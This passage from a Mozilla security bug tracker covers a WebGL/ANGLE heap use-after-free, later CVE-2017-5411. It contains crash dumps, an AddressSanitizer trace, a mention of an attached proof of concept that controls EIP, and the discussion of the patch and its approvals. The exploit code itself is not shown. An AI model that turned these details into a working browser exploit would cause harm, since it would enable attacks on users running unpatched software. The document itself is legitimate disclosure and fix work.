00000082`717ff970 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x34
FOLLOWUP_IP:
ucrtbase!abort+4e
00007ffe`837398fe cd29 int 29h
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: ucrtbase!abort+4e
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: ucrtbase
IMAGE_NAME: ucrtbase.dll
DEBUG_FLR_IMAGE_TIMESTAMP: 5632d193
STACK_COMMAND: ~61s ; kb
BUCKET_ID: FATAL_APP_EXIT_ucrtbase!abort+4e
PRIMARY_PROBLEM_CLASS: FATAL_APP_EXIT_ucrtbase!abort+4e
FAILURE_PROBLEM_CLASS: FATAL_APP_EXIT
FAILURE_EXCEPTION_CODE: c0000409
FAILURE_IMAGE_NAME: ucrtbase.dll
FAILURE_FUNCTION_NAME: abort
FAILURE_SYMBOL_NAME: ucrtbase.dll!abort
FAILURE_BUCKET_ID: FATAL_APP_EXIT_c0000409_ucrtbase.dll!abort
ANALYSIS_SOURCE: UM
FAILURE_ID_HASH_STRING: um:fatal_app_exit_c0000409_ucrtbase.dll!abort
FAILURE_ID_HASH: {f324e349-b0b7-1f0f-a2b4-a992c83e193a}
Followup: MachineOwner
|
|
Reporter | |
Comment 18•8 years ago
|
||
(In reply to Milan Sreckovic [:milan] from comment #15)
> Daniel, this is a bug in ANGLE, so possibly reproducible in Chrome as well.
> Either way, can you help opening a Chrome security bug and maybe CC one of
> their security people on this bug, or we can copy the details?
I can reproduce it with the exact same test case in Google Chrome. shall I report it to google?
=================================================================
==16136==ERROR: AddressSanitizer: heap-use-after-free on address 0x21013e40 at pc 0x0892d9dc bp 0x00cfcb5c sp 0x00cfcb50
READ of size 4 at 0x21013e40 thread T0
==16136==WARNING: Failed to use and restart external symbolizer!
==16136==*** WARNING: Failed to initialize DbgHelp! ***
==16136==*** Most likely this means that the app is already ***
==16136==*** using DbgHelp, possibly with incompatible flags. ***
==16136==*** Due to technical reasons, symbolization might crash ***
==16136==*** or produce wrong results. ***
#0 0x892d9db in rx::Buffer11::updateBufferStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:807
#1 0x8921254 in rx::Buffer11::getBufferStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:695
#2 0x8920bf8 in rx::Buffer11::getSystemMemoryStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:323
#3 0x8921c98 in rx::Buffer11::setSubData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:360
#4 0x89205fa in rx::Buffer11::setData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:305
#5 0x8716ffa in gl::Buffer::bufferData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\Buffer.cpp:57
#6 0x85e17de in gl::Context::bufferData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\Context.cpp:3568
#7 0x1a947c33 in gpu::gles2::BufferManager::DoBufferData C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\buffer_manager.cc:463
#8 0x1a9476a7 in gpu::gles2::BufferManager::ValidateAndDoBufferData C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\buffer_manager.cc:431
#9 0x1c4bb499 in gpu::gles2::GLES2DecoderImpl::HandleBufferData C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\gles2_cmd_decoder.cc:12316
#10 0x1c52e219 in gpu::gles2::GLES2DecoderImpl::DoCommandsImpl<0> C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\gles2_cmd_decoder.cc:5204
#11 0x1a966da7 in gpu::CommandParser::ProcessCommands C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\cmd_parser.cc:53
#12 0x1c5918f5 in gpu::CommandExecutor::PutChanged C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\command_executor.cc:61
#13 0x1c4b73de in gpu::CommandBufferService::Flush C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\command_buffer_service.cc:98
#14 0x1acfb725 in gpu::GpuCommandBufferStub::OnAsyncFlush C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_command_buffer_stub.cc:829
#15 0x1acfb160 in IPC::MessageT<GpuCommandBufferMsg_AsyncFlush_Meta,std::tuple<int,unsigned int,std::vector<ui::LatencyInfo,std::allocator<ui::LatencyInfo> > >,void>::Dispatch<gpu::GpuCommandBufferStub,gpu::GpuCommandBufferStub,void,void (gpu::GpuCommandBufferStub::*)(int, unsigned int, const std::vector<ui::LatencyInfo,std::allocator<ui::LatencyInfo> > &) __attribute__((thiscall))> C:\b\c\b\win_asan_release\src\ipc\ipc_message_templates.h:120
#16 0x1acf696f in gpu::GpuCommandBufferStub::OnMessageReceived C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_command_buffer_stub.cc:244
#17 0x1ace55c0 in gpu::GpuChannel::HandleMessageHelper C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_channel.cc:802
#18 0x1ace5379 in gpu::GpuChannel::HandleMessage C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_channel.cc:782
#19 0x1acec3ca in base::internal::Invoker<base::internal::BindState<void (gpu::GpuChannel::*)(const scoped_refptr<gpu::GpuChannelMessageQueue> &) __attribute__((thiscall)),base::WeakPtr<gpu::GpuChannel>,scoped_refptr<gpu::GpuChannelMessageQueue> >,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:340
#20 0x1355a645 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:50
#21 0x134082df in base::MessageLoop::RunTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:413
#22 0x13409126 in base::MessageLoop::DeferOrRunPendingTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:422
#23 0x1340a436 in base::MessageLoop::DoWork C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:515
#24 0x13560c3a in base::MessagePumpDefault::Run C:\b\c\b\win_asan_release\src\base\message_loop\message_pump_default.cc:33
#25 0x13407349 in base::MessageLoop::RunHandler C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:378
#26 0x134863cd in base::RunLoop::Run C:\b\c\b\win_asan_release\src\base\run_loop.cc:37
#27 0x15a59482 in content::GpuMain C:\b\c\b\win_asan_release\src\content\gpu\gpu_main.cc:303
#28 0x1329a477 in content::RunNamedProcessTypeMain C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:416
#29 0x1329bb14 in content::ContentMainRunnerImpl::Run C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:793
#30 0x1329a050 in content::ContentMain C:\b\c\b\win_asan_release\src\content\app\content_main.cc:20
#31 0xfeb11fe in ChromeMain C:\b\c\b\win_asan_release\src\chrome\app\chrome_main.cc:112
#32 0xb7b77 in MainDllLoader::Launch C:\b\c\b\win_asan_release\src\chrome\app\main_dll_loader_win.cc:173
#33 0xb1943 in main C:\b\c\b\win_asan_release\src\chrome\app\chrome_exe_main_win.cc:248
#34 0x2c609d in __scrt_common_main_seh f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl:253
#35 0x76d638f3 in BaseThreadInitThunk+0x23 (C:\WINDOWS\SYSTEM32\KERNEL32.DLL+0x6b8138f3)
#36 0x77cc5de2 in RtlUnicodeStringToInteger+0x252 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x4b2e5de2)
#37 0x77cc5dad in RtlUnicodeStringToInteger+0x21d (C:\WINDOWS\SYSTEM32\ntdll.dll+0x4b2e5dad)
0x21013e40 is located 0 bytes inside of 28-byte region [0x21013e40,0x21013e5c)
freed by thread T0 here:
#0 0x2acc58 in free e:\b\build\slave\win_upload_clang\build\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cc:44
#1 0x89315a0 in rx::Buffer11::SystemMemoryStorage::~SystemMemoryStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:253
#2 0x8926261 in rx::Buffer11::checkForDeallocation C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:552
#3 0x89266ce in rx::Buffer11::markBufferUsage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:580
#4 0x892139c in rx::Buffer11::getBufferStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:696
#5 0x892299e in rx::Buffer11::getStagingStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:847
#6 0x892d34f in rx::Buffer11::updateBufferStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:795
#7 0x8921254 in rx::Buffer11::getBufferStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:695
#8 0x8920bf8 in rx::Buffer11::getSystemMemoryStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:323
#9 0x8921c98 in rx::Buffer11::setSubData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:360
#10 0x89205fa in rx::Buffer11::setData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:305
#11 0x8716ffa in gl::Buffer::bufferData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\Buffer.cpp:57
#12 0x85e17de in gl::Context::bufferData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\Context.cpp:3568
#13 0x1a947c33 in gpu::gles2::BufferManager::DoBufferData C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\buffer_manager.cc:463
#14 0x1a9476a7 in gpu::gles2::BufferManager::ValidateAndDoBufferData C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\buffer_manager.cc:431
#15 0x1c4bb499 in gpu::gles2::GLES2DecoderImpl::HandleBufferData C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\gles2_cmd_decoder.cc:12316
#16 0x1c52e219 in gpu::gles2::GLES2DecoderImpl::DoCommandsImpl<0> C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\gles2_cmd_decoder.cc:5204
#17 0x1a966da7 in gpu::CommandParser::ProcessCommands C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\cmd_parser.cc:53
#18 0x1c5918f5 in gpu::CommandExecutor::PutChanged C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\command_executor.cc:61
#19 0x1c4b73de in gpu::CommandBufferService::Flush C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\command_buffer_service.cc:98
#20 0x1acfb725 in gpu::GpuCommandBufferStub::OnAsyncFlush C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_command_buffer_stub.cc:829
#21 0x1acfb160 in IPC::MessageT<GpuCommandBufferMsg_AsyncFlush_Meta,std::tuple<int,unsigned int,std::vector<ui::LatencyInfo,std::allocator<ui::LatencyInfo> > >,void>::Dispatch<gpu::GpuCommandBufferStub,gpu::GpuCommandBufferStub,void,void (gpu::GpuCommandBufferStub::*)(int, unsigned int, const std::vector<ui::LatencyInfo,std::allocator<ui::LatencyInfo> > &) __attribute__((thiscall))> C:\b\c\b\win_asan_release\src\ipc\ipc_message_templates.h:120
#22 0x1acf696f in gpu::GpuCommandBufferStub::OnMessageReceived C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_command_buffer_stub.cc:244
#23 0x1ace55c0 in gpu::GpuChannel::HandleMessageHelper C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_channel.cc:802
#24 0x1ace5379 in gpu::GpuChannel::HandleMessage C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_channel.cc:782
#25 0x1acec3ca in base::internal::Invoker<base::internal::BindState<void (gpu::GpuChannel::*)(const scoped_refptr<gpu::GpuChannelMessageQueue> &) __attribute__((thiscall)),base::WeakPtr<gpu::GpuChannel>,scoped_refptr<gpu::GpuChannelMessageQueue> >,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:340
#26 0x1355a645 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:50
#27 0x134082df in base::MessageLoop::RunTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:413
#28 0x13409126 in base::MessageLoop::DeferOrRunPendingTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:422
previously allocated by thread T0 here:
#0 0x2acd3c in malloc e:\b\build\slave\win_upload_clang\build\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cc:65
#1 0x8c829d8 in operator new f:\dd\vctools\crt\vcstartup\src\heap\new_scalar.cpp:19
#2 0x892c5f0 in rx::Buffer11::allocateStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:709
#3 0x8921062 in rx::Buffer11::getBufferStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:686
#4 0x8920bf8 in rx::Buffer11::getSystemMemoryStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:323
#5 0x8921c98 in rx::Buffer11::setSubData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:360
#6 0x89205fa in rx::Buffer11::setData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:305
#7 0x8716ffa in gl::Buffer::bufferData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\Buffer.cpp:57
#8 0x85e17de in gl::Context::bufferData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\Context.cpp:3568
#9 0x1a947c33 in gpu::gles2::BufferManager::DoBufferData C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\buffer_manager.cc:463
#10 0x1a9476a7 in gpu::gles2::BufferManager::ValidateAndDoBufferData C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\buffer_manager.cc:431
#11 0x1c4bb499 in gpu::gles2::GLES2DecoderImpl::HandleBufferData C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\gles2_cmd_decoder.cc:12316
#12 0x1c52e219 in gpu::gles2::GLES2DecoderImpl::DoCommandsImpl<0> C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\gles2_cmd_decoder.cc:5204
#13 0x1a966da7 in gpu::CommandParser::ProcessCommands C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\cmd_parser.cc:53
#14 0x1c5918f5 in gpu::CommandExecutor::PutChanged C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\command_executor.cc:61
#15 0x1c4b73de in gpu::CommandBufferService::Flush C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\command_buffer_service.cc:98
#16 0x1acfb725 in gpu::GpuCommandBufferStub::OnAsyncFlush C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_command_buffer_stub.cc:829
#17 0x1acfb160 in IPC::MessageT<GpuCommandBufferMsg_AsyncFlush_Meta,std::tuple<int,unsigned int,std::vector<ui::LatencyInfo,std::allocator<ui::LatencyInfo> > >,void>::Dispatch<gpu::GpuCommandBufferStub,gpu::GpuCommandBufferStub,void,void (gpu::GpuCommandBufferStub::*)(int, unsigned int, const std::vector<ui::LatencyInfo,std::allocator<ui::LatencyInfo> > &) __attribute__((thiscall))> C:\b\c\b\win_asan_release\src\ipc\ipc_message_templates.h:120
#18 0x1acf696f in gpu::GpuCommandBufferStub::OnMessageReceived C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_command_buffer_stub.cc:244
#19 0x1ace55c0 in gpu::GpuChannel::HandleMessageHelper C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_channel.cc:802
#20 0x1ace5379 in gpu::GpuChannel::HandleMessage C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_channel.cc:782
#21 0x1acec3ca in base::internal::Invoker<base::internal::BindState<void (gpu::GpuChannel::*)(const scoped_refptr<gpu::GpuChannelMessageQueue> &) __attribute__((thiscall)),base::WeakPtr<gpu::GpuChannel>,scoped_refptr<gpu::GpuChannelMessageQueue> >,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:340
#22 0x1355a645 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:50
#23 0x134082df in base::MessageLoop::RunTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:413
#24 0x13409126 in base::MessageLoop::DeferOrRunPendingTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:422
#25 0x1340a436 in base::MessageLoop::DoWork C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:515
#26 0x13560c3a in base::MessagePumpDefault::Run C:\b\c\b\win_asan_release\src\base\message_loop\message_pump_default.cc:33
#27 0x13407349 in base::MessageLoop::RunHandler C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:378
#28 0x134863cd in base::RunLoop::Run C:\b\c\b\win_asan_release\src\base\run_loop.cc:37
SUMMARY: AddressSanitizer: heap-use-after-free C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:807 in rx::Buffer11::updateBufferStorage
Shadow bytes around the buggy address:
0x34202770: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x34202780: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x34202790: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x342027a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x342027b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x342027c0: fa fa fa fa fa fa fa fa[fd]fd fd fd fa fa fd fd
0x342027d0: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
0x342027e0: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
0x342027f0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
0x34202800: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
0x34202810: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==16136==ABORTING
Flags: needinfo?(loobenyang)
|
|
Reporter | |
Comment 19•8 years ago
|
||
Reported to google: https://bugs.chromium.org/p/chromium/issues/detail?id=682020
Thanks for the quick fix Milan, please let me know if there is anything else I can help.
|
|
||
Updated•8 years ago
|
Flags: needinfo?(dveditz)
Keywords: csectype-uaf,
sec-high
|
|
Assignee | |
Comment 20•8 years ago
|
||
(In reply to Looben Yang from comment #19)
> Reported to google:
> https://bugs.chromium.org/p/chromium/issues/detail?id=682020
>
> Thanks for the quick fix Milan, please let me know if there is anything else
> I can help.
Thanks. You can put a note in the chromium bug with my e-mail in that bug if they want to know the results of our investigation and our current fix/workaround?
|
|
Assignee | |
Comment 21•8 years ago
|
||
Something similar was originally tracked as bug 1248276, but it was never identified as security and we didn't get far with it, other than "ANGLE update solves it". Which it clearly didn't :)
|
|
Assignee | |
Comment 22•8 years ago
|
||
Comment on attachment 8827288 [details] [diff] [review]
Speculative, mark as used earlier.
While we're waiting for ANGLE team to respond, lets see if it makes sense to land this. Morris, you've looked at bug 1248276, can you take a look at this bug and this patch?
Attachment #8827288 -
Flags: review?(mtseng)
|
||
Updated•8 years ago
|
Attachment #8827288 -
Flags: review?(mtseng) → review+
|
|
Reporter | |
Comment 23•8 years ago
|
||
(In reply to Milan Sreckovic [:milan] from comment #20)
> (In reply to Looben Yang from comment #19)
> > Reported to google:
> > https://bugs.chromium.org/p/chromium/issues/detail?id=682020
> >
> > Thanks for the quick fix Milan, please let me know if there is anything else
> > I can help.
>
> Thanks. You can put a note in the chromium bug with my e-mail in that bug
> if they want to know the results of our investigation and our current
> fix/workaround?
Done.
|
|
Assignee | |
Comment 24•8 years ago
|
||
Comment on attachment 8827288 [details] [diff] [review]
Speculative, mark as used earlier.
[Security approval request comment]
How easily could an exploit be constructed based on the patch? Not easily, just based on the patch.
Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem? Not really.
Which older supported branches are affected by this flaw? Likely. This is a problem in ANGLE, but it isn't clear that a particular version introduced it.
If not all supported branches, which bug introduced the flaw?
Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?
The ports are trivial.
How likely is this patch to cause regressions; how much testing does it need? There would be a temporary increase in memory usage, but, I believe, only in the cases where deleting that memory would lead to UAF, so that's OK.
Attachment #8827288 -
Flags: sec-approval?
|
|
Assignee | |
Comment 25•8 years ago
|
||
This appears to be a ~50 crashes per day case (see bug 1248276.)
|
|
Assignee | |
Updated•8 years ago
|
Assignee: nobody → milan
|
||
Comment 26•8 years ago
|
||
sec-approval for checkin on February 7, two weeks into the new cycle.
I'm going to assume this affects 52 and higher. I would like to know if this affects ESR45.
status-firefox51:
--- → wontfix
status-firefox52:
--- → affected
status-firefox54:
--- → affected
tracking-firefox52:
--- → +
tracking-firefox53:
--- → +
tracking-firefox54:
--- → +
Whiteboard: [checkin on 2/7]
|
|
||
Updated•8 years ago
|
Attachment #8827288 -
Flags: sec-approval? → sec-approval+
|
|
Reporter | |
Comment 27•8 years ago
|
||
A new POC UAF_updateBufferStorage_POC_EIP_41414141.html is attached to illustrate the clear exploitability of this bug by controlling the EIP register.
Firefox version: 53.0a1 (2017-01-21) (32-bit)
OS: Windows 10 64 bit
(114fc.1b754): Access violation - code c0000005 (!!! second chance !!!)
eax=e5e5e5e5 ebx=244312e0 ecx=244312e0 edx=00000000 esi=227f03d0 edi=227f03d0
eip=41414141 esp=00ffdd28 ebp=00ffdd60 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
41414141 ?? ???
00ffdd4c 227f03d0 00000000 0x41414141
00ffdd84 244312e0 00000000 libGLESv2!rx::Buffer11::updateBufferStorage+0xde
00ffdda8 00000000 17264c80 libGLESv2!rx::Buffer11::getBufferStorage+0x85
00ffddd8 00000000 17264c80 libGLESv2!rx::Buffer11::getSystemMemoryStorage+0x13
00ffde10 00008892 18258000 libGLESv2!rx::Buffer11::setSubData+0x94
00ffde44 00008892 18258000 libGLESv2!rx::Buffer11::setData+0x29
-------- -------- -------- libGLESv2!gl::Buffer::bufferData+0x1b
00008892 00000877 18258000 libGLESv2!gl::Context::bufferData+0x34
00008892 00000877 18258000 libGLESv2!gl::BufferData+0x40
-------- -------- -------- xul!mozilla::gl::GLContext::raw_fBufferData+0x16
00008892 00000877 18258000 xul!mozilla::gl::GLContext::fBufferData+0x1a
00008892 00000877 18258000 xul!mozilla::WebGLBuffer::BufferData+0xc3
00008892 00000877 18258000 xul!mozilla::WebGLContext::BufferDataImpl+0x48
00008892 00000877 00000000 xul!mozilla::WebGLContext::BufferData+0x82
1373d000 00ffe024 15fe9c00 xul!mozilla::dom::WebGL2RenderingContextBinding::bufferData+0x29c
1373d000 00000003 15fe9c00 xul!mozilla::dom::GenericBindingMethod+0xc2
-------- -------- -------- xul!js::CallJSNative+0xe9
00000000 1373d000 00000000 xul!js::InternalCallOrConstruct+0x4b4
1373d000 00006000 23d44038 xul!InternalCall+0xa8
00ffead8 00ffead8 00ffead8 xul!Interpret+0x5f7e
|
||
Comment 28•8 years ago
|
||
status-firefox-esr45:
--- → affected
tracking-firefox-esr45:
--- → ?
Flags: in-testsuite?
Whiteboard: [checkin on 2/7]
|
||
Comment 29•8 years ago
|
||
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla54
|
|
Assignee | |
Comment 30•8 years ago
|
||
Jeff, can you track this and make sure it survives our next ANGLE update, or that it shows up in the upstream build. Whether it's this particular change or the equivalent.
Flags: needinfo?(jgilbert)
|
|
Assignee | |
Comment 32•8 years ago
|
||
Comment on attachment 8827288 [details] [diff] [review]
Speculative, mark as used earlier.
Approval Request Comment
[Feature/Bug causing the regression]:
[User impact if declined]: UAF, sec-high
[Is this code covered by automated tests?]: No
[Has the fix been verified in Nightly?]: Yes
[Needs manual test from QE? If yes, steps to reproduce]:
[List of other uplifts needed for the feature/fix]:
[Is the change risky?]: Not risky as a change, but until we get a confirmation from Chrome, it may not be the fix they would have chosen. This is the simplest one.
[Why is the change risky/not risky?]:
[String changes made/needed]:
Attachment #8827288 -
Flags: approval-mozilla-beta?
Attachment #8827288 -
Flags: approval-mozilla-aurora?
|
|
||
Updated•8 years ago
|
Group: gfx-core-security → core-security-release
|
||
Comment 33•8 years ago
|
||
Comment on attachment 8827288 [details] [diff] [review]
Speculative, mark as used earlier.
avoid uaf in angle, aurora53+, beta52+
Attachment #8827288 -
Flags: approval-mozilla-beta?
Attachment #8827288 -
Flags: approval-mozilla-beta+
Attachment #8827288 -
Flags: approval-mozilla-aurora?
Attachment #8827288 -
Flags: approval-mozilla-aurora+
|
|
||
Comment 34•8 years ago
|
||
| uplift | ||
|
|
||
Comment 35•8 years ago
|
||
Comment on attachment 8827288 [details] [diff] [review]
Speculative, mark as used earlier.
See comment 32.
Attachment #8827288 -
Flags: approval-mozilla-esr45?
|
||
Comment 36•8 years ago
|
||
Comment on attachment 8827288 [details] [diff] [review]
Speculative, mark as used earlier.
Fix a sec-high. ESR45+.
Attachment #8827288 -
Flags: approval-mozilla-esr45? → approval-mozilla-esr45+
|
||
Comment 37•8 years ago
|
||
Flagging this for verification, instructions in Comment 0.
Flags: qe-verify+
|
|
Assignee | |
Comment 39•8 years ago
|
||
I don't know that this applies to ESR45; it may have been a more recent change in ANGLE that broke this.
Flags: needinfo?(milan)
|
|
||
Updated•8 years ago
|
Attachment #8831423 -
Attachment mime type: text/plain → text/html
|
|
||
Comment 40•8 years ago
|
||
I can reproduce the crashes on a Win10 machine with a GeForce GTX 1060 graphics card.
Original testcase crash report UAF: bp-901cff05-ce78-4c6c-a092-748c12170214
The EIP control crash: bp-0324a1dd-0922-42e3-8ae2-823f42170214
|
|
||
Comment 41•8 years ago
|
||
Sorry if that alarmed anyone: I reproduced using the same 53.0a1 2016-12-22 nightly the reporter originally used. Using yesterday's 53 Aurora or the current 52 Beta 5 I could no longer reproduce. Appears to be fixed.
|
|
||
Comment 42•8 years ago
|
||
I was not able to reproduce on a Win7 laptop with a NVIDIA Quadra 1000M graphics card.
|
|
||
Comment 43•8 years ago
|
||
(In reply to Milan Sreckovic [:milan] from comment #39)
> I don't know that this applies to ESR45; it may have been a more recent
> change in ANGLE that broke this.
On the same machine as in comment 40 and 41 I cannot reproduce on ESR 45.7
|
|
||
Comment 44•8 years ago
|
||
status-firefox-esr52:
--- → fixed
tracking-firefox-esr52:
--- → ?
|
|
||
Updated•8 years ago
|
Flags: sec-bounty? → sec-bounty+
|
|
||
Comment 45•8 years ago
|
||
I was unable to reproduce this crash on our Windows test machines using AMD GPUs. I tried 52.0a2-win32 (20161222004019) with ATI Radeon 3000, AMD Radeon R7 200 and NVIDIA GeForce 210 -- no success.
Removing qe-verify+ since there's nothing else I can do here to help. If there's someone else that could verify this on Beta 52 at least, that would be great.
Flags: qe-verify+
|
||
Updated•8 years ago
|
Whiteboard: [post-critsmash-triage]
|
|
||
Updated•8 years ago
|
tracking-firefox-esr52:
? → ---
Whiteboard: [post-critsmash-triage] → [post-critsmash-triage][adv-main52+]
|
|
||
Updated•8 years ago
|
Alias: CVE-2017-5411
|
||
Comment 46•8 years ago
|
||
Flags: needinfo?(jgilbert)
|
|
||
Comment 47•8 years ago
|
||
(In reply to Jeff Gilbert [:jgilbert] from comment #46)
> Fixed upstream:
> https://github.com/google/angle/commit/
> c1a5d16e964ad524487eac9d2e4b5a65d837ff27
Our fix is not their fix. we set "mIdleness[usage] = 0;" in one place, they do it in two. (and the one place we do it is after the newStorage->resize() instead of before, but shouldn't matter if that's a simple reallocation as it sounds -- but maybe it does matter)
Looks like bug 1328762 was basically a dupe of this bug, but now shows that crashes were still happening in nightlies a couple of months after our fix was checked in.
Flags: needinfo?(jgilbert)
|
|
||
Updated•8 years ago
|
See Also: → CVE-2017-5031
|
|
||
Updated•8 years ago
|
Keywords: regression,
regressionwindow-wanted
|
|
||
Comment 48•8 years ago
|
||
We thought we were fine before. I remember our fix being fine. Feel free to double-check though.
Flags: in-testsuite? → in-testsuite-
|
|
||
Updated•8 years ago
|
Flags: needinfo?(jgilbert)
|
|
||
Updated•7 years ago
|
Group: core-security-release
|
||
Updated•4 months ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•